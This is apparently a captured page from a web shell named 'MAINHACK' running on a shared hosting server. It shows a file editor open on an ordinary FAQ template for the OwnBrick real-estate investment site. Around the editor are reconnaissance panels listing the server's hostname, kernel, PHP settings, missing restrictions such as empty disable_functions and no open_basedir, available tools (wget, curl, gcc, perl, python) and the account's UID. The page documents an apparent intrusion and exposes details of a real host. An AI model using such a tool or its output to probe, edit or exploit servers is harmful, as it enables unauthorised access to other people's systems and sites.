[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: faq.php
<!-- Header include --> <?php include("header.php"); ?> <!-- Inner Banner --> <div class="inner-banner"> <img src="images/inner-banner-6.png" alt=""> <div class="inner-banner-block"> <div class="container"> <h1 class="inner-head">Frequently Asked <span>Questions</span></h1> <div class="inner-nav"> <ul> <li><a href="index.php">Home</a></li> <li>//</li> <li>FAQs</li> </ul> </div> </div> </div> </div> <!-- FAQ Start --> <div class="inner-faq"> <div class="container"> <h2>Frequently Asked <span>Questions</span></h2> <!--<p>Address investor fears and show transparency</p>--> <div class="row"> <div class="col-md-12 col-sm-7 col-xs-12" data-aos="fade-down" style="transition: all 1800ms ease-in-out;"> <?php $count=1; $sr='faq'; $stmt =$show->readAll_clause($sr,'order by id asc'); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <button class="accordion"><?=$row['name']?></button> <div class="accordion-content"> <?=htmlspecialchars_decode($row['description'])?> </div> <?php } }?> <!--- <button class="accordion">Who manages the property?</button> <div class="accordion-content"> <p> The property is managed by the OwnBrick team along with the LLP partners. We take care of documentation, compliance, tenant coordination (if applicable), and reporting, so investors don’t have to worry about day-to-day hassles. </p> </div> <button class="accordion">How can I exit my investment?</button> <div class="accordion-content"> <p> An investor can sell or transfer their share in the LLP to another interested buyer, subject to the LLP agreement. OwnBrick facilitates such transfers to make the process smoother, but the decision and terms remain between the exiting partner and the incoming one. </p> </div> <button class="accordion">How can I exit my investment?</button> <div class="accordion-content"> <p> An investor can sell or transfer their share in the LLP to another interested buyer, subject to the LLP agreement. OwnBrick facilitates such transfers to make the process smoother, but the decision and terms remain between the exiting partner and the incoming one. </p> </div> <button class="accordion">What are the risks?</button> <div class="accordion-content"> <p> Like all investments, real estate carries risks. These may include:<br /> • Market fluctuations in property values.<br /> • Rental income variations depending on occupancy.<br /> • Legal/regulatory changes that may affect ownership or compliance.<br /> At OwnBrick, we minimize risks by ensuring due diligence, compliance with laws, and transparent reporting. </p> </div> <button class="accordion">How does taxation work?</button> <div class="accordion-content"> <p> Since every investment is made through an LLP, taxation applies at the partner level. Income (rental or otherwise) is distributed to partners, and each partner pays tax on their share as per their individual tax status. We provide all necessary documentation to ensure smooth tax reporting. </p> </div> ---> </div> </div> </div> </div> <!-- Testimonial --> <!-- <div class="testimonial"> <div class="container"> <h2>Client <span>Testimonial</span></h2> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p> <div class="row"> <div class="col-md-8 col-sm-6 col-xs-12"> <div id="testimonial-slider" class="owl-carousel" data-aos="fade-left" style="transition: all 1500ms ease-in-out;"> <div class="item"> <div class="testimonial-block"> <div class="top-block"> <div class="top-left-block"> <h4>Excellent</h4> <div class="rating-star"> <ul> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-regular fa-star"></i></li> </ul> </div> </div> <div class="top-right-block"> <i class="fa-solid fa-quote-left"></i> </div> </div> <div class="testimonial-middle-content"> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p> </div> <div class="testimonial-profile"> <div class="profile-left"> <i class="fa-solid fa-user"></i> </div> <h5>Raja Sarkar</h5> </div> </div> </div> <div class="item"> <div class="testimonial-block"> <div class="top-block"> <div class="top-left-block"> <h4>Excellent</h4> <div class="rating-star"> <ul> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-regular fa-star"></i></li> </ul> </div> </div> <div class="top-right-block"> <i class="fa-solid fa-quote-left"></i> </div> </div> <div class="testimonial-middle-content"> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p> </div> <div class="testimonial-profile"> <div class="profile-left"> <i class="fa-solid fa-user"></i> </div> <h5>Raja Sarkar</h5> </div> </div> </div> </div> </div> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="testimonial-right-content" data-aos="fade-right" style="transition: all 1800ms ease-in-out;"> <img src="images/testimonial-image.png" alt=""> </div> </div> </div> </div> </div> --> <!-- Footer include --> <?php include("footer.php"); ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 678.08 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619